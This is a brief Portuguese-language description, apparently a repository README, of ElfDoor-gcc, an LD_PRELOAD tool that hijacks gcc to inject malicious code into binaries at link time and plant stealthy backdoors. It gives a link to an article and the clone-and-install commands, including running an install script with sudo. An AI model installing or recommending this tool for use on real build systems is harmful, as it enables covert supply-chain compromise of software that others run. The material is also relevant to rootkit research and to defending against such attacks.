
Ferramenta baseada em LD_PRELOAD que sequestra o gcc para injetar código malicioso em binários durante a vinculação, permitindo a implantação furtiva de backdoors sem modificação do código-fonte.
ElfDoor-gcc é um LD_PRELOAD que sequestra o gcc para injetar código malicioso em binários durante a ligação (linking), sem tocar no código fonte.
Artigo Detalhado: https://matheuzsecurity.github.io/hacking/gcc/
git clone https://github.com/MatheuZSecurity/ElfDoor-gcc
cd ElfDoor-gcc
chmod +x install.sh
sudo ./install.sh
Pesquisadores de Rootkit